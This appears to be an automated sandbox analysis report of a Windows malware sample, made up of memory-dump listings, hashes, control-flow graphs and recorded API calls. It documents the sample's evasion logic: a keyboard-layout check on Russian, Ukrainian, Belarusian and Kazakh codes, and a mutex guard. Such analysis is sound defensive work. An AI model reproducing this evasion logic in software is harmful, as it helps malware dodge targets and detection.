                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 41caee13a4d2d3e8f75839153a2a1430ea25f22622371c62ca5326486f7ce0bb
                                                                                                                                              • Instruction ID: e66f22f21a431be429ffe4bc4629c7ae4165cd71c09e21fed11cb16840968ab4
                                                                                                                                              • Opcode Fuzzy Hash: 41caee13a4d2d3e8f75839153a2a1430ea25f22622371c62ca5326486f7ce0bb
                                                                                                                                              • Instruction Fuzzy Hash: 0EE08C30140108AFDF36BB58D92DE8C3BA9EB61749F843C20F81CA6226CB25DE81C780
                                                                                                                                              Function 05050000 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: 67eaa37b7f9cd023c8cc34291a420d5b4432cedb5e5242f80b596a7c10602071
                                                                                                                                              • Instruction ID: b77fabf371b6045500efc031ab0272a11b58fbe4fef47e4a79ccd445e1e55010
                                                                                                                                              • Opcode Fuzzy Hash: 67eaa37b7f9cd023c8cc34291a420d5b4432cedb5e5242f80b596a7c10602071
                                                                                                                                              • Instruction Fuzzy Hash: E101D4AB04C224BE2153D8827B3C9BF3B6FE5D7330B30902ABC4797642F1954A59A172
                                                                                                                                              Function 00E55C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                              • API String ID: 0-3963862150
                                                                                                                                              • Opcode ID: d280e3453d99cf95f4f8820342990e4c7575e8d0c6d4bcd2815a385699aedd40
                                                                                                                                              • Instruction ID: ce77ef4464c31eed73796a7f998adae3398422e7937928acafd2d0461bf60149
                                                                                                                                              • Opcode Fuzzy Hash: d280e3453d99cf95f4f8820342990e4c7575e8d0c6d4bcd2815a385699aedd40
                                                                                                                                              • Instruction Fuzzy Hash: 01F1E471A002489BEB24DF54CC85BDEBBB9EF45304F5046A8F918B72C1DB749A88CF95
                                                                                                                                              Function 00E59BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 92 e59ba5-e59d91 call e67a00 call e55c10 call e58b30 call e68220
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 94d1fa15a107f5205993f3751fe0cc4e821ba7239ea618113e88f6a9d80ce62a
                                                                                                                                              • Instruction ID: 3f5f2572e82717c837c399203e3867d267e770c20b193963cd96a7ccd6181f6a
                                                                                                                                              • Opcode Fuzzy Hash: 94d1fa15a107f5205993f3751fe0cc4e821ba7239ea618113e88f6a9d80ce62a
                                                                                                                                              • Instruction Fuzzy Hash: 67312871604200CBFB08DB78EC8979DFBA2EBC1315F286B18E814B73D6C77559898752
                                                                                                                                              Function 00E59F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 114 e59f44-e59f64 118 e59f66-e59f72 114->118 119 e59f92-e59fae 114->119 120 e59f74-e59f82 118->120 121 e59f88-e59f8f call e6d663 118->121 122 e59fb0-e59fbc 119->122 123 e59fdc-e59ffb 119->123 120->121 128 e5a92b 120->128 121->119 124 e59fd2-e59fd9 call e6d663 122->124 125 e59fbe-e59fcc 122->125 126 e59ffd-e5a009 123->126 127 e5a029-e5a916 call e680c0 123->127 124->123 125->124 125->128 131 e5a01f-e5a026 call e6d663 126->131 132 e5a00b-e5a019 126->132 134 e5a953-e5a994 Sleep CreateMutexA 128->134 135 e5a92b call e86c6a 128->135 131->127 132->128 132->131 144 e5a9a7-e5a9a8 134->144 145 e5a996-e5a998 134->145 135->134 145->144 146 e5a99a-e5a9a5 145->146 146->144
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4801a237da14c6d6ad2ccfe79191457fbb1e30cbcb217747def8aabc7aef1f48
                                                                                                                                              • Instruction ID: 8b976564e62cc5c152848e7877594705390d865a791110e28f6b4f1c20faa003
                                                                                                                                              • Opcode Fuzzy Hash: 4801a237da14c6d6ad2ccfe79191457fbb1e30cbcb217747def8aabc7aef1f48
                                                                                                                                              • Instruction Fuzzy Hash: C23128717042008BEB18DB78EC857ADB7A2EFC5315F286B28E814F73D5C73559888762
                                                                                                                                              Function 00E5A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 148 e5a079-e5a099 152 e5a0c7-e5a0e3 148->152 153 e5a09b-e5a0a7 148->153 156 e5a0e5-e5a0f1 152->156 157 e5a111-e5a130 152->157 154 e5a0bd-e5a0c4 call e6d663 153->154 155 e5a0a9-e5a0b7 153->155 154->152 155->154 158 e5a930-e5a994 call e86c6a Sleep CreateMutexA 155->158 160 e5a107-e5a10e call e6d663 156->160 161 e5a0f3-e5a101 156->161 162 e5a132-e5a13e 157->162 163 e5a15e-e5a916 call e680c0 157->163 178 e5a9a7-e5a9a8 158->178 179 e5a996-e5a998 158->179 160->157 161->158 161->160 168 e5a154-e5a15b call e6d663 162->168 169 e5a140-e5a14e 162->169 168->163 169->158 169->168 179->178 180 e5a99a-e5a9a5 179->180 180->178
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
